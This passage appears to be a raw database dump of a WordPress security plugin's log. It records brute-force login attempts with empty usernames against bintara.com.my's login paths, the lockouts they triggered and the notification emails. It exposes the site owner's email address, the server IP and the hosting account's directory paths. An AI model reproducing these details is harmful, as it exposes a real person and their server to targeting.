attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:31:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:31:49\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:31:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:31:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:31:50','2019-09-21 14:31:49',18238976,19644616,'https://bintara.com.my/wp/wp-login.php',1,0,'222.239.90.55'),(26302,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:31:50','2019-09-21 14:31:49',18446928,19644616,'https://bintara.com.my/wp/wp-login.php',1,0,'222.239.90.55'),(26303,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0X3kXpgmG5P@iB8k@4wAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.247.210\";s:11:\"REMOTE_PORT\";s:5:\"56522\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0X3kXpgmG5P@iB8k@4wAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076319.8544\";s:12:\"REQUEST_TIME\";s:10:\"1569076319\";}}','notice','2019-09-21 14:32:01','2019-09-21 14:32:00',18160480,19645248,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.247.210'),(23473,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-30 19:34:18','2019-08-30 19:34:14',17780384,18242704,'http://www.bintara.com.my/',1,0,'23.129.64.214'),(26335,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2TTDrcQxTmGrCWuaVoAAAAdQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.142.82\";s:11:\"REMOTE_PORT\";s:5:\"56364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2TTDrcQxTmGrCWuaVoAAAAdQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076813.4316\";s:12:\"REQUEST_TIME\";s:10:\"1569076813\";}}','notice','2019-09-21 14:40:14','2019-09-21 14:40:13',18162144,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.142.82'),(26304,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:32:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:32:00\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:32:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:32:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:32:01','2019-09-21 14:32:00',18245264,19645248,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.247.210'),(26305,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:32:01','2019-09-21 14:32:00',18451648,19645248,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.247.210'),(26306,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0c1iJ7D9Gn7wDPh8m1QAAAMk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.15.209.93\";s:11:\"REMOTE_PORT\";s:5:\"60172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0c1iJ7D9Gn7wDPh8m1QAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076339.3779\";s:12:\"REQUEST_TIME\";s:10:\"1569076339\";}}','notice','2019-09-21 14:32:20','2019-09-21 14:32:19',18160168,19644904,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.209.93'),(26307,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:32:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:32:19\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:32:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:32:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:32:20','2019-09-21 14:32:19',18244824,19644904,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.209.93'),(26308,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:32:20','2019-09-21 14:32:19',18451296,19644904,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.209.93'),(26309,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0pXkXpgmG5P@iB8k-HwAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"38928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0pXkXpgmG5P@iB8k-HwAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076389.4095\";s:12:\"REQUEST_TIME\";s:10:\"1569076389\";}}','notice','2019-09-21 14:33:10','2019-09-21 14:33:09',18161032,19645200,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26310,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:33:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:33:09\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:33:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:33:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:33:10','2019-09-21 14:33:09',18245112,19645200,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26311,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:33:10','2019-09-21 14:33:09',18451784,19645200,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26312,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0-1iJ7D9Gn7wDPh8nBAAAAMg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"219.107.52.92\";s:11:\"REMOTE_PORT\";s:5:\"34662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0-1iJ7D9Gn7wDPh8nBAAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076479.9639\";s:12:\"REQUEST_TIME\";s:10:\"1569076479\";}}','notice','2019-09-21 14:34:41','2019-09-21 14:34:40',18158392,19646840,'https://bintara.com.my/2019/wp-login.php',1,0,'219.107.52.92'),(26313,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:34:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:34:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:34:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:34:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:34:41','2019-09-21 14:34:40',18243192,19646840,'https://bintara.com.my/2019/wp-login.php',1,0,'219.107.52.92'),(26314,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:34:41','2019-09-21 14:34:40',18449688,19646840,'https://bintara.com.my/2019/wp-login.php',1,0,'219.107.52.92'),(26315,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY1BHkXpgmG5P@iB8k-bQAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"60.245.60.151\";s:11:\"REMOTE_PORT\";s:5:\"57562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY1BHkXpgmG5P@iB8k-bQAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076484.3703\";s:12:\"REQUEST_TIME\";s:10:\"1569076484\";}}','notice','2019-09-21 14:34:45','2019-09-21 